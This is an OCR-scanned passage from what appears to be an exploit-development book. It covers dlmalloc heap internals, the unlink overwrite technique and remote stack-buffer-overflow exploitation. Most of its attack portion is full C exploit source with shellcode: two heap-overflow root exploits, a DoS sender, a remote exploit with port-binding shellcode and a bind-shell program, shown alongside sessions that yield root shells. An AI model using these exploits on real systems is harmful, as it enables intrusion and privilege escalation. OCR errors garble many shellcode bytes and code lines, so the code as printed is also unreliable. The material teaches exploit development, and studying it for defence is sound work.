ence between them, which is 208 bytes. This gives reason to suspect that some additional 
invisible memory, at a size of 8 bytes, is allocated between the two buffers in the heap. This ts 
actually the case. The malloc () function always allocates more memory than requested. Even 
if 0 bytes is requested in the heap — mallioc(0) — the function allocates at least 8 bytes. 
The heap memory is allocated and freed according to a quite complex algorithm, and in addi- 
tion to the buffers themselves, some necessary service information is saved in the heap. The 
exploit technique developed by Solar Designer is based on overwriting this service information 
in the heap. 


13.4.3. The Doug Lea Algorithm 


Linux used the heap allocation algorithm developed by Doug Lea, unofficially called dlmalloc. 
All standard —- for dynamically allocating and freeing heap memory — malloc(), 

calloc(), realloc(), and free({) — are based on the dlmalloc algorithm. The com- 
mented source ode of the algorithm can be found on Doug Lea's Internet page 
(http://gee.cs.oswego.edu/pub/misc/malloc.c). The algorithm is continuously improved, so 
the information given in this section may not be applicable to its newer versions. 

You may wonder why an algorithm to manage the heap memory is needed. Indeed, no 
algorithms are needed to allocate buffers in the stack and the BSS area. But stack and BSS 
buffers are usually allocated once and do not change during program execution. The heap 
is specifically intended for to allocate and change buffers during program execution; that is, 
the memory in it is allocated and freed dynamically. By constantly allocating and freeing 
memory in the heap, the heap memory space may eventually become heavily fragmented, 
with no single free memory area suitable for allocation. It is to avoid this undesirable devel- 
opment that allocating and freeing heap memory must be managed using special algo- 
rithms. Such algorithms must keep track of released memory chunks and reuse them when 
necessary; moreover, they must do this quite rapidly. The dlmalloc algorithm meets these 
requirements. 

The general structure of the heap memory allocated using the dimalloc algorithm 
is shown in Fig. 13.6. 

Altogether, there are three buffers allocated in the heap shown in Fig. 13.6. Each buffer has 
a special mandatory service header. Doug Lea calls a buffer-header unit a chunk. Therefore, 
from now on a buffer is an allocated heap memory area without the header and a chunk is an 
allocated memory area with its header. 

All new chunks are allocated from the so-called wilderness areas of the heap, that is, from 
the unused heap area at higher memory addresses. Actually, wilderness is the initial state of 
the heap. The last allocated memory chunk always neighbors with the wilderness. 

There are two types of allocated heap chunks: unused space and user data. Unused chunks 
are those chunks freed by the free() function or created when the initial size of a chunk was 
reduced by the realloc() function. User data are those chunks still being used by the program. 
The type of a chunk determines the format of its service header. 
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Fig. 13.6. An example of heap memory allocation 


The chunk header is defined by the following general structure: 

struct malloc_chunk { 
INTERNAL SIZE T prev size; 
INTERNAL SIZE T size; 
struct malloc chunk * fd; 
struct malloc chunk * bk; 

bi 

typedef struct malloc chunk* mchunkptr; 

Depending on whether a chunk is unused space or user data, some fields of the structure 
may be not used. 

The prev size field contains the size of the previous chunk if it is free space. If the previous 
chunk is user data, this field is a part of its data; that is, the previous chunk can store 4 bytes 
of its data in this field (the size of the prev_size field is only 4 bytes). 

The size field holds the size of the current chunk in bytes. Because the value of the size 
field is always a multiple of eight, its three least significant bits are always zeros. These bits, or 
rather only the two least significant bits, are used by the dlmalloc algorithm as control flags: 

#define PREV INUSE 0x1 

#define IS MMAPPED 0x2 
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A set IS MMAPPED bit means that the current chunk was allocated by the mmap () function. 
For writing exploits, this bit presents no interest; the least significant bit of the size field, 
PREV INUSE, however, is of special interest to exploit developers. If this bit is set to 1, this tells 
you that the previous chunk, adjacent to the current one, is user data. If the bit is set to 0, this 
means that the previous, adjacent to the current, chunk is unused space and the prev size 
field holds the size of this chunk. 

The following two fields are pointers and are present only in headers of unused space 
chunks. The bk field is a pointer to the previous unused space chunk, and the fd field is 
a pointer to the next unused space chunk. 

The dimalloc algorithm registers all unused space chunks in a doubly-linked list, which is 
why the bk and fd pointers are needed. Moreover, dlmalloc supports multiple doubly-linked 
lists, each containing unused space chunks of certain size. Each of these doubly-linked lists 
ends in a so-called bin. A bin is nothing but a forward and a backward pointer and is the head 
of a doubly linked list. The dimalloc algorithm supports 128 bins. The bin, to which an un- 
used space chunk ts placed, depends on the chunk’s size: 


© A 200-byte chunk will be registered in the bin storing chunks exactly 200 bytes in size. 

CJ A 1,504-byte chunk will be registered in the bin storing chunks greater than or equal 
to 1,472 bytes but no less than 1,536 bytes in size. 

O <A 16,392-byte chunk will be registered in the bin storing chunks greater than or equal 
to 16,384 bytes but no less than 20,480 bytes in size. 


The limits are calculated and the bins are selected according to certain algorithms, which 
can be examined in the source code of dlmallcc. For the task of writing exploits, these algo- 
rithms are of no interest. 

A call of the free() function results in one of the following: 


Calling free (0) produces no changes. 

A freed chunk bordering the wilderness is merged with it. 

A freed chunk bordering only user data chunks is registered in one of the bins. 
A freed chunk bordering an unused space chunk is merged with this chunk. 


OOOO 


In the latter case, the free () function must first release the freed chunk from the doubly 
linked list, which it does by calling the unlink () macro: 

#define unlinkiP, BRK, FD) { 

FD = P->fd; 
BK = P->bk; 
FD->bk = BK; 
BK->fd = FD; 

) 

The macro replaces the BK pointer of the chunk following P with a pointer to the chunk 
preceding P in this list. The FD pointer of the preceding chunk is replaced with a pointer to the 
chunk following P in the list. 

After a freed chunk is merged with an unused space chunk, the new chunk is registered 
in one of the bins. 
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13.4.4. Constructing the Exploit 


The unlink() macro is of great importance to exploit developers. Being able to overwrite the 
bk and fd pointers in the header of an unused space chunk and to call unlink () for it allows 
you to write any data to any memory location. The fa pointer is offset 12 bytes from the start 
of the header; the bk pointer is offset 8 bytes: 

// 4 bytes for size, 4 bytes for prev_size, and 4 bytes for fd 

*(P=>fd + 12) = P=>bk; 
// 4 bytes for size and 4 bytes for prev size 
*(P->bk + 8) = P->fd; 

Usually, the bk pointer is overwritten with the address of some function from GOT. In the 
vulnerable program (Listing 13.32), the unlink() macros is called by the free (a) function, 
which is followed by the free (b) function; consequently, you have no choice but to use for 
overwriting only the address of the free () function in GOT. Thus, bk is overwritten with the 
address of the free() function in GOT, and fd is overwritten with the address of the shell- 
code. In this case, the unlink () macro looks like the following: 

FD = P->free; 

BK = P->ret? 

FD-> (free + 12) = ret; 

BK->(ret + 8) = free; 

Here, free is the address of the free(}) function in GOT and ret is the address of 
the shellcode in the memory. As a result, the address of the shellcode will be written at the ad- 
dress free + 12. However, it needs to be written exactly at the address of the free() function. 
Therefore, bk must be replaced with the address of free () minus 12. In this case, unlink () 
looks as follows: 

FD = P->(free -— 12); 


BER = P->ret; 
FD->(free - 12 + 12) = ret; 
BE-> (ret + 8) = free; 


Now the address of free() is overwritten with the shellcode’s address and the vulnerable 
program will call the shellcode instead of free (b). As you can see, only the penultimate line in 
unlink () performs the necessary write: 

FD-> (free - 12 + 12) = ret; 

The last line in unlink (), however, cannot be ignored: 

BK->(ret + 8) = free; 

It writes the address of the function being rewritten at the location offset 8 bytes after the 
shellcode’s address. This means that bytes 9, 10, 11, and 12 of the shellcode will be damaged. 
Therefore, an instruction to do a 12-byte forward jump must be added at the beginning of the 
shellcode for it to execute successfully. A 12-byte jump can be performed by the '\xeb\x0c' 
machine instruction; however, because the instruction itself takes 2 bytes, the jump must be 
only 10 bytes long. This jump can be executed with the '"\\xeb\x0a' machine instruction. 

As already mentioned, for the unlink () macro to be called, the chunk being freed must be 
adjacent to an unused space chunk. Initially, both chunks in the vulnerable program are user 
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data chunks. Because the free (b) function must call the shellcode, there is no other choice 
but to make the free(a) function call the unlink() macro. To this end, a dummy unused 
space chunk must be created right after the a chunk. 

This can be achieved as shown in Fig. 13.7. When free (a) is called, it will check whether 
the next chunk is unused. First, the size field in the header of the dummy chunk will be in- 
spected to find the size field of the next chunk, which is also created by the exploit’s devel- 
oper. In this field, the PREV_INUSE bit must be set to 0; thus, the function will decide that the 
second dummy chunk is unused and will call the unlink(Ff1) macro. The result will be the 
necessary memory overwrites. 


Low addresses 
Chunk A 
Data (200 bytes) Data (200 bytes) 
Fake 
Chunk B . chunk F1 


prev_8ze (wyCOp) 
size of B(PREV_INUSE=1) ss sizeof F1 


Data (64 bytes) | 
size (mycop c PREV_INUSE=0 





Before overfiowing After overflowing 
Fig. 13.7. Overflowing the heap with dummy chunks 


This solution can be improved by getting rid of the second dummy chunk. It is possible to 
make the size field of the dummy chunk point to the prev size field of the same dummy 
chunk as to the next chunk. Simply set the size field to —4 (in exploits, the hexadecimal value of 
Oxf£££f£ffc is often used). This is possible because the PREV_INUSE bit is checked as follows: 


#define inuse bit at offset(p, s)\ 
((imechunkptr) (((char*) (p)) + (8)))->size & PREV INUSE) 
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Low addresses 


| 0 evisize  prev_size : 
size of A 


Chunk A_ 















rere 


Data (200 bytes) Data or shellcode 


Chunk B 








prev_size of A 


: | prev_size (MyCcop ¢ PREV_INUSE=0) 
size of B (PREV_INUSE=1) | 





Data (64 bytes) 


Before overflowing After overflowing 


Fig. 13.8. Overflowing the heap with dummy chunks (the improved version) 


The overflowed buffer in this case will look as shown in Fig. 13.8. 

Listing 13.33 shows the source code for an exploit to place shellcode into a vulnerable 
buffer. Listing 13.34 shows the improved version of the source code, which places the shell- 
code into an environment variable. 

The address of the free () function in GOT is determined as follows: 

# Oobjdump -R ./heap vuln | grep free 

080496ec R386 JUMP SLOT free 

The address of the shellcode in the vulnerable buffer is determined using the 1t race utility: 

# ltrace ./heap vuln 2>61 | grep 200 

fallee (200) = 0x080497b8 

The obtained value is the starting address of the chunk; therefore, it must be increased by 
8 to skip the prev size and size fields. 

The results are compiled, run, and checked as follows: 

# gcc heap vuln.c -o heap vuln 

# gcc expl heapl.c -o expl heapl 


# chmod ug+s ./heap vuln 
# ls -la ./heap_ vuln 
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=Iwsr-sr-% 1 reot root 14222 Apr 20 04:18 ./heap vuln 
# su nobody 

sh-2.045 id 

uid=99 (nobody) gid=99(nobody) groups=99 (nobody) 

sh-2.04$ ./expl_ heapl 

{the output is skipped) 

sh-2.04# id 

uid=0(reot) gid=0(root) groups=99 (nobody) 

sh-2.04% 


The operation of the second exploit is checked in the same way. 
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Listing 13.33. Placing the shellcode in the vulnerable buffer (exp!_heap1.c) 


#include <stdio.h> 
finclude <string.h> 
#include <unistd.h> 


#define FREE GOT ADDRESS 0x080496ec 
#define RET (Ox080497b8 + 8) 
#define GARBAGE 0x12345678 


char shellcode[] = 
"\xeb\xOQaxXkXhXXXXRKK" 
"Wx 33 \ec0\x31\xdb\xbO\Vx1T \ecd'\x8o0" 
"\x33\xcO\x31\xdb\xb0\x2e\xcd\x80" 
"\eeb\xlf\x5e\xb9\x76\x08\xS1 ec" 
"\x88\x46\x07\x89\x46\e0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" 
"\ecd\x80\n31\xdb\x89\ed8 \x40\xcd" 
"\xEO0\xe8\xdc\xX EE \xtf\xtt" 
"/bin/sh"; 


int main (} 

{ 
char buf[300]; 
char *p; 


p = buf; 

*((vold **)p) = (void *) (GARBAGE); 

pt= 4; 

*((void **)p) = (void *) (GARBAGE) ; 

p += 4; 

memcpy(p, shellcode, strlen(shellcode) ); 

p += strlen(shellcode); 

memset(p, ‘A', 200 - 2 * 4 - strlen(shellcode) ); 
p += (200 - 2 * 4 - strlen(shellcode) ); 


*((size t *)p) = (size_t) (GARBAGE & ~0x1); 

p += 4; 

*((size t *")p) = (size t} (-4); 

p += 4; 

*{(void **)p) = (void *) (FREE_GOT_ ADDRESS - 12); 
p += 4; 

*((void **)p) = (void *) (RET); 


p += 4; 
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*D = VO": 
execl("./heap vuln", "heap vuln", buf, 0); 


return 0; 





Listing 13.34. Placing the shellcode in an environment variable (expl_heap2.c) 





#include <stdio.h> 
#include <string.h> 
#include <unistd.h> 


#define FREE GOT ADDRESS 0x080496ec 
#define GARBAGE 012345678 


char shellcode[] = 
"\xeb\x0akXkxxxekkkx" 
"WHOS \xCO\K31 \xdb\xb0\x17\xcd\x80" 
M\xHSS3\xcO\x31\xdb\xbO\x2e\xcd \\x80" 
"\xED\H1£\x5e\x8 9 \476\x08 \x31\xc0" 
"\XMBS\H46\x07\KBO\H4d6\x0c\xbO\x0b" 
"\MBO\ MES \eSd\x4de\x08 \ebd\x56\x0c" 
"\xcd \\x80\x31\xdb\x89\e2d8\x40\xcd" 
"\xBO\xe8 \xdc\x ft \xffi\xtt" 
"/bin/sh"; 


int main() 
{ 
char *env[] = {shellcode, NULL}; 
char but[(300]; 
long ret; 
char *p; 


ret = OxcO000000 - 6 - strlen(shellecode) - strien("./heap vuln"); 
p= but; 

memsetip, ‘At, 200); 

p += 200; 

*((Size t *)p) = (size_t) (GARBAGE & ~O0x1); 

p t= 47 

*{(size_t *)p) = (size_t) (-4); 

p t= 4 

*((void **)p}) = (void *) (FREE _GOT_ADDRESS - 12); 
p t= 4; 

*{(void **)p) = (void *) (ret); 

pt 4 

+p = '\0'; 


execle("./heap vuln", "heap vuln", buf, NULL, env); 


return 0; 





The source codes for all programs in this section can be found in the /PART III/ 
Chapter 13/13.4 directory on the accompanying CD-ROM. 
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The internal construction of remote exploits is significantly different from that of local ex- 
ploits. But the general operation principle of remote exploits is similar to that of local exploits. 
It is the following: A string containing a shellcode is sent to a vulnerable server. The string makes a 
butter overflow and causes the shellcode to be executed. The shellcode opens access to the server's 
command line at a certain port or allows access to the vulnerable server in some other way. 

The source codes for all programs in this section can be found in the /PART III/Chapter 14 
directory on the accompanying CD-ROM. 


14.1. Vulnerable Service Example 


A remote service, or a daemon, may have the same main types of vulnerabilities that were con- 
sidered in the chapter on local exploits (Chapter 13): stack, BSS, or heap buffer overflow and 
format string errors. | only consider developing remote exploits for the stack buffer overflow 
error. This example and those considered for local exploits should allow you to construct re- 
mote exploits for the other types of vulnerabilities, Listing 14.1 shows an example of a vulner- 
able service. 


Listing 14.1. Vulnerable service 





#include <stdio.h> 
fFinclude <stdlib.h> 
#include <netdb.h> 
#include <sys/socket.h> 
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#include <sys/types.h> 


#define BUFFER SIZE 1000 
fdefine NAME SIZE 2000 


hello client(int sock) 


{ 


} 


char buf [BUFFER SIZE]; 
char name(NAME SIZE]; 
int nbytes; 


strepy(buf, "Enter your name: "); 
send(sock, buf, strlen(buf), 0); 


if ( (nbytes = recv(sock, name, sizeof(name), 9)) > 0) { 
name [nbytes-1) = '\OQ'; 
sprintf (buf, “Hello ts\r\n", name); 
send(sock, buf, strlen(but), 0); 

} 


int main(int argc, char *argv[]) 


{ 


int sd; 
int clisd; 
struct sockaddr in servaddr; 


if (argc != 2) | 
printf("Usage: s <port>\n", argv[0]); 
exit (-1)}; 

} 

if ( (sd = socket (PF INET, SOCK_STREAM, 0)) < 0) { 
perror("socket{) failed"); 


exit(-1)}; 


} 


bzero(4&servaddr, sizeof (servaddr) ); 
servaddr.sin family = AF INET; 


servaddr.sin_addr.s addr = htonl(INADDR_ANY); 
servaddr.sin_port = htons{atoil(argv[1)))}; 


if (bind(sd, (struct sockaddr*)&servaddr, sizeof(servaddr)) != 0) 
perror("bind() failed"); 
exit (-1); 


} 


if (listen(sd, 30) != 0) { 
perror("listen({) failed"); 
exit (-1); 


I 


for(;7) { 
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if { {clisd = accept(sd, NULL, NULL)}) < 0) { 
perror("accept({) failed"); 
exit(-1); 

} 


hello client (clisd); 
close (clisd); 
| 


return OQ; 
} 





Compile and run the service: 

¢# gcc vulnserver.c -o vulnserver 

# ./vulnserver 7777 

The number 7777 is the port used by the service. If the service is run with root privileges, 
any port can be used. A nonprivileged user can only use a port beyond the 1—1,024 range. 

Now, you can connect to the vulnerable service using the standard telnet client: 

# telnet 12/.0.0.1 777? 

Trying 127.0.0.1... 

Connected to localhost (127.0.0.1). 

Escape character is '*]'. 

Enter your name: Sklyaroff 

Hello Skiyaroff 

Connection closed by foreign host. 

ff 

The service simply requests a name and sends a greeting in reply. 


14.2. DoS Exploit 


In the source code of the service, a 1,000-byte buffer named buf is defined. The buffer is used 
to copy into it the entered name; the length of the name, however, can be up to 2,000 bytes 
long. Consequently, if a client enters a name longer than 1,000 characters, after it is copied to 
the buf buffer by the sprintf () function, the buffer overflows. 

Because entering 2,000 characters manually is tedious, delegate it to a DoS exploit, which 
will send a string of a specified length to the service. The source code for such an exploit 
is shown in Listing 14.2. In the command line, the DoS exploit must be passed the IP address 
of the server, the address of the vulnerable service, and the number of the sent bytes (i.e., the 
length of the string). The DoS exploit sends a string of the specified length composed of 
A, characters only (code 0x41). 





Listing 14.2. DoS exploit (dos.c) 





#include <stdio.h> 
finclude <stdlib.h> 
#include <netdb.h> 
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finclude <netinet/in.h> 
finclude <sys/types.h> 
finclude <sys/socket.h> 
finclude <string.h> 


int main(int argc, char *argv[]) 
[ 

int sd; 

int i; 

int nbytes; 

char *buf; 

struct sockaddr in servaddr; 


if (argc '= 4) { 
printf ("Usage : dos <ip> <port> <number of bytes>\n\n"); 
exit(-1)}; 


nbytes = atoi(argv([3]); 
buf = (char*)malloc(nbytes); 


servaddr.sin_family = AF_INET; 
servaddr.sin addr.s addr = inet _addr{argv[1]); 
servaddr.sin port = htons({atoilargv(2])); 


if { (sd = socket (PF_INET, SOCK STREAM, 0)} < 0) { 


perror("socket() failed"); 
exit(-l); 


memset (buf, 'A', nbytes); 


if (connecti(sd, (struct sockaddr*)&servaddr, sizeof(servaddr)) != 0) { 
perror ("connect () failed"); 
exit(-1)}; 


send(sd, buf, strlen(buf), 0}; 


free (buf); 
close (sd); 





Suppose that the vulnerable service is sent 1,500 bytes: 


*# gcc dos.c -o dos 

# ./dos 

Usage : dos <ip> <port> <number of bytes> 
# .f/dos 127.0.0.1 7777 1500 


It will terminate abnormally and issue the Segmentation fault (core dumped) message. 
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14.3. Constructing a Remote Exploit 


Because the buffer in the vulnerable service is defined in the hello client () function, there 
must be a return address for this function in the stack. Consequently, this return address can 
be overwritten to pass execution control to a shellcode. 

To determine the return address for the hello client () function, load the service in GDB: 

# gdb -q ./vulnserver 

(gdb) xr 30000 

Starting program: /home/ ./vulnserver 30000 

The service was started on port 30000. Run the DoS exploit: 

# ./dos 127.0.0.1 30000 2000 


It results in the following output from the debugger: 

Program received signal SIGSEGV, Segmentation fault. 

0x41414141 in ?? () 

(gdb) 

The return address in the stack was overwritten, which wrote the value of 041414141 to 
the EIP register. The program referenced this address and crashed. The postcrash contents of 
the registers are the following: 


(qdb) x Sesp 

Oxbrftrrod0: 0x41414141 

(qdb) i r ebp eip 

ebp Ox41414141 0x41414141 
eip 0x41414141 0x41414141 
(gdb) 


Now, view the contents of the buffer: 


(qdb) x/200bx Sesp-200 

Oxbfttfr908: Ox41 Ox4l Ox41 Oxd4l Ox41 Ox41 Ox41 0x41 
OxbfffFf910: Ox41 Ox41 Ox41 Ox41 0x41 Ox41 Ox41 Ox41 
Oxbfftrfsle: Oxdl Ox4] Ox4l Ox4dl Ox4dl Ox4dl1 Ox4l1 0x41 
OxbffFF920: Ox41 Ox4l Ox41 Ox41 Ox41l Oxdl Ox41 0x41 
OxbEfftt926: Ox41 Ox4dl Ox4dl Ox41 Ox41 Ox4l1 Ox41 0x41 
OxbfffFf930: Ox41 0x41 0x41 Ox4l 0x41 Ox41 Ox41 0x41 
Oxb£ffffS938: Ox4l Ox41l Ox4]1 Ox4l1 Ox4l Ox4l Ox4l 0x41 
OxbffFft940: Ox41 On41 Ox41 Ox41 0x41 Ox4l1 Ox4l Ox41 
OxbEfEE946: Oneal Ox4l Ox4al Ox4dl Ox4dl Oxdl Ox4l Ox4l 
Oxbffff950: Ox41 Ox4l Ox4l1 0x41 Ox4l1 Ox41 Ox4l1 0x41 
Oxbfftt95s8: Ox4]1 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 
Oxbfffft9e0: Ox4]1 Ox41 Ox4l Ox41 Oxdl Ox41 Ox41 0x41 
Oxbffff968: Ox4l Ox41 Ox4l1 Ox4l Ox41 Ox4l1 Ox4l 0x41 
OmbEffEST7O: Ox4l Ox4l Ona] Oxdl Oxdl Ox4d1 Oxdl1 Oxd4l1 
OxbffFfC978: Ox4l Ox41 Ox41 Ox4l Ox41 Ox41 Oxd4l Ox41 
Oxbftfftft98O0: Ox4l1 Oxdl Oxdl Ox4l Ox4l1 Ox41 Ox4l 0x41 
Oxbf£fEf98e: Ox4dl Ox41 Ox4l Ox4l Ox41 Ox41 Ox4l Ox41 
OxbtftE990: Ox4dl Ox4dl Ox4dl Ox4l Ox4dl Ox41 Ox4l Ox4dl 
Oxb£fFf998: Oxdl Ox41 Ox41 Ox41 0x41 Ox41 Ox4l 0x41 
OxbffEf9a0; Ox4l Ox4l Ox4l Ox4l Ox41 Ox4l1 Ox4l 0x41 
Oxbfftft9as: Ox4dl] Oxdl Ox4l Ox4dl1 Ox4dl Oxdl Oxdl Ox4l 
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OxbEfttf9bO: Ox4l Ox4l Ox41 Ox4l1 Ox41 Ox41 0x41 Ox41 
Oxbffff6be: Ox4l1 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 Ox41 
OxbEfEF6cO: Oxdl Ox41 Ox4al Ox41 Ox41 Ox41 Ox4l Ox4dl 
---Type <return> to continue, or q <return> to quit--- 


Any of these addresses can be used as the return address for the exploit, but | recommend 
using an address roughly in the middle of the buffer. 

The exploit uses port-binding shellcode, which will open access to a shell on a port of the 
vulnerable server. Programming port-binding and other types of remote shellcodes is consid- 
ered in Section 14.4, 

The exploit must send a string longer than 1,000 bytes; therefore, a buffer for 1,050 bytes 
is prepared, which should be enough to overwrite the return address. The buffer is filled with 
NOP instructions (code 0x90), the shellcode is placed in the middle of the buffer, and then the 
return address is placed at the end of the buffer. The string passed to the vulnerable program 
will look like the following: 

WOP NOP NOP ... Shelleode ... RET RET RET 


The source code for this remote exploit is shown in Listing 14.3. 

You can check the exploit’s operation by running it on the local machine. First run the 
vulnerable service in a terminal window: 

# gcc vulnserver.c -o wulnserver 

# ./vulnserver 60000 


Then open a new terminal window and run the exploit in it: 
# gcc expl remote.c -o expl remote 

Usage: ./expl remote <target> <port> <ret> 

# .fexpl remote 127.0.0.1 60000 Oxbffrro7d 


If the exploit executes successfully, the shellcode will open port 30454, to which you can 
connect using the netcat utility: 


# nc 
id 


127.0.0.1 30464 


uid=0 (root) gid=0 (root) groups=0(root), l(bin), 2@(daemon), 3(sys), 4(adm), 6(disk), 
LO (wheel) 





Listing 14.3. A remote exploit (expl_remote.c) 





finclude 
#include 
#include 
#include 
Finclude 
finclude 
finclude 


<stdio.h> 
<Stdlib.h> 
<sys/types.h> 
<sys/socket.h> 
<netdb.h> 
<netinet/in.h> 
<string.h> 


char shellcode[] = 


/* main: 


/ 


"\xeb\x72" /* jmp line */ 


** start: 


at 


"\x5e" /* popl tesi */ 





/* socket (AF INET, 


ye 31\xco" {* 
"\xe9\x46\x10" {* 
"\xdo" j* 
 WHeS\xc3" ‘iia 
"\x89\ed6\x0c" /* 
40" je 
"\s89\x46\x08" /* 
"\eAd\x4de\xoa" ;= 
 xbO\x66" {* 
"\xcd\x80" /* 
/* bind(sd, (struct sockaddr 
"\x43" /* 
"\xc6\x46\x10\x10" j* 
"\x66\x89\x5e\x14" /* 
"\ x86 \x46\x08" {* 
" We31\xco" /* 
"WBS \xc2" /* 
"\HaO\ed6\x18" i* 
" \xbO\x77" /* 
"\HO6\xXO9\\x46\x16" f* 
"\e@d\x4e\x14" /* 
"\x89\x4e\x0c" /* 
"\x8d\x4de\x08" f* 
"\xbO\*x66" {* 
"\xcd \x80" /* 
/* listen(sd, 1) */ 
"\HeO\e5e\x0c" j* 
x43" /* 
wWxd3" j* 
"\xbO\x66" /* 
"\ecd\x80" i* 
/* accept(sd, NULL, 0) */ 
"\HES'\e56\x00" {* 
1x8 9\x56\x10" /* 
"\xb0\x66" i* 
"\xd3" /* 
*\xcd\x80" /* 
/* dup2(cli, 0) */ 
"\86\xo3" /* 
 WxbO\x3i" /* 
Wie31\xes" ix 
"\acd\x80" rik 
f* dup2(cli, 1) */ 
TT WebO'*\13£" /* 
"\x41" ;* 
"\ecd\x8o" /* 


/* dup2(cli, 2) */ 
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SOCK STREAM, 0) */ 


$eax, teax */ 

teax, Oxl0(%esi) */ 
teax */ 

teax, tebx */ 

teax, OxOc(%esi) */ 
teax */ 

teax, OxO8(%esi) *,/ 
leal OxO08(%esi), tecx */ 
movb $0x66, tal */ 

int $0x80 */ 
*)aservaddr, sizeot(servaddr)) */ 


xorl 
mov 
incl 
movi 
movi 
incl 
mow) 


incl tebx */ 
movb $0x10, Oxl0(%esi) */ 
movw thx, Oxl4(%esi) */ 
movb Sal, Ox08(%esi) */ 
xorl teax, teax */ 
movl $eax, %edx */ 
movl teax, OxlB(t%esi) */ 
movb $Ox77, tal */ 
movw %ax, Oxlé(tesi}) */ 
leal 0x14(%esi), tecx */ 
movl tecx, OxOc(%esi} */ 
leal OxO08(tesi), tecx */ 
movb $0x66, tal */ 

int $0x80 */ 
movl tebx, Ox0c(%esi) */ 


incl tebx */ 
incl tebx */ 
movb 50x66, tal */ 
int $080 */ 


movl tedu, OxOc(tesi) */ 
movl tedx, Ox10(%esi} */ 
movb 50x66, tal */ 

incl tebx */ 

int 50x80 */ 


xchgb Sal, tbl */ 


* movb $0x3f, tal */ 


xorl $ecx, tecx */ 
int $0x80 */ 


movb $0x3f, tal */ 
incl tecx */ 
int $0x80 */ 
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"\xbO\x3£" /* movb $0x3f, tal */ 
sd" /* incl tecx */ 
"\xod\x80" /* int §$0x80 */ 


/* execl() */ 


"\x88\x56\x07" /* movb dl, Ox07(%esi) */ 
"\HB9\e76\x0c" /* movl tesi, Ox0c(t%esi) */ 
\x87\xta" /* uchgl tesi, tebx */ 
"\x8d\x4b\x0c" /* leal OxOc(%ebx), tecx */ 
"\xbO\x0b" /* movb $0x0b, tal */ 
"\xcd\x80" /* int S0xE0 */ 

/* line: */ 


"\WHeb\eBO\etft\eMeEf\xfi"™ /* call start */ 
"/bin/sh"; 


int main(int argc, char *argv[]} 


{ 


char buf[1050); 

leng ret; 

char *ptr; 

long *addr ptr; 

int sd, i; 

struct hostent *hp; 

struct sockaddr in remote; 


if(arge != 4) { 
fprintf(stderr, "Usage: ts <target> <port> <ret>\n", argv([0]); 
exit (-1); 

} 


ret = strtoul(argv[3], NULL, 16); 


memset (buf, 0x90, 1050); 
memcpy (buf + LOOL - sizeof(shellcode), shellcode, sizeof(shellcode)); 
buf[(1000] = Ox90; 
for(i = 1002; 1 < 1046; i += 4) { 
* ({int *) &but[i}) = ret; 
} 
buf[1050] = Ox0; 


if ( (hp = gethostbyname(argv[1])) == NULL) { 
herror("gethostbyname() failed"); 
exit (-1); 


} 


if ( (sd = socket (PF_INET, SOCK_STREAM, 0)) < 0) { 
perror ("socket () failed"); 
exit(-1); 

} 


remote.sin_family = AF_INET; 
remote.sin_addr = *((struct in_addr *)hp->h_addr); 
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remote.sin port = htons(atoi(argv[2])); 


if (connectisd, (struct sockaddr *)&remote, sizeof(remote)) == -1) { 
perror("connect() failed"); 


1 


close (sd}; 
exit(-1L); 
} 


send(sd, buf, sizeoft(buf), 0); 


close (sd); 





14.4. Remote Shellcodes 


Remote shellcodes differ significantly from shellcodes used in local exploits. There are numer- 
ous types of remote shellcodes; | consider all the main ones. 


14.4.1. Port-Binding Shellcode 

This type of shellcode is in essence a bind shell backdoor, which was considered in Chapter 11. 
A port-binding shellcode simply opens access to a command shell at a certain port. The source 
code for this shellcode is shown in Listing 14.4. 





Listing 14.4. Port-binding shellcode (bindport.c) 





#include <stdio.h> 
finclude <netinet/in.h> 
f#finclude <sys/types.h> 
#include <sys/socket.h> 
f#include <unistd.h> 


int sd, cli; 
struct sockaddr in servaddr; 


int main({} 

{ 
servaddr.sin family = AF INET; 
servaddr.sin_addr.s addr = INADDR_ANY; 
servaddr.sin port = htons (30464); 
sd = socket (AF INET, SOCK STREAM, 0); 
bind(sd, (struct sockaddr *)&servaddr, sizeof (servaddr)); 
listen(sd, 1); 
cli. = accept(sd, NULL, W); 
dup2 (cli, QO); 
dup2 (cli, 1); 
dup2 (cli, 2); 
exec] ("/bin/sh", "sh", NULL); 
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Compile and disassemble the program: 
# gcc bindport.c -o bindport -g --static 
# gdb -q ./bindport 


First, disassemble the main() function (Listing 14.5). 


Listing 14.5. The disassembled main() function 





(qdb) disassemble main 

Dump of assembler code for function main: 

OxB048le0 <main>: push %ebp 

Ox8048lel <main + 1>: mov ‘esp, tebp 
OxB048le3 <main + 3>: sub $0x8, tesp 
OxBO0481£5 <main + 21>: movw $0x2, Ox809f9a0 
Ox80481lfe <main + 30>: movi 50x0, Ox809f9a4 
Ox8048208 <main + 40>; sub $OQxc, tesp 
OxB04820b <main + 43>: push $0x7700 
Ox68048210 <main + 48>: call Ox€04d350 <htons> 
Ox8049215 <main Sa add 50x10, tesp 
OxB048218 <main + 56>: mow $eax, Feax 
OxBO4821la <main 58>: mov ‘ean, eax 
OxBOde21c <main 60>: mov tax, Oxb09f9a2 
OxBO048222 <main 66>: sub 50x4, tesp 
Ox8048225 <main + 69>: push $0x0 

OxB048227 <main + 71>: push $0x1 

OxBO48229 <main + 73>: push $0x2 

OxnB04622b <main + 75>: call Ox604d330 <__socket> 
Ox8048230 <main + 80>: add $0x10, tesp 
OxBO48233 <main 83>: mow ‘eax, *eax 
Ox8048235 <main B5>: mow feax, Oxb09f9b4 
Ox804823a <main + 90>: sub s0x4, tesp 
OxBO4823d <main + 93>: push $0x10 

OxBO4823E <main + 95>; push $0x809f9a0 
OxBOd48244 <main 100>: pushl Oxe8o9fSb4 
Oxb04824a <main 106>: call OxBOdd2f0 <bind> 
Ox604824f <main + 111>: add 30x10, tesp 
Ox8048252 <main 114>; sub $0x8, tesp 
Ox6048255 <main 117>: push S0x1 

Ox8048257 <main 119>: pushl Oxeoofop4 
OxBO4825d <main 125>: call 0x8040d310 <listen> 
Ox8048262 <main + 130>: add $0x10, tesp 
OxBO46265 <main 133>; sub S0x4, tesp 
OxB048268 <main + 136>: push $0x0 

Ox804826a <main + 138>: push $0x0 

OxBO4826c <main + 140>: pushl Oxs09f9b4 
OxB048272 <main + 146>: call OxéO04d2d0 <_ libec accept> 
OxBO48277 <main 151>: add 70x10, esp 
Ox804827a <main 154>: mov eax, %eax 
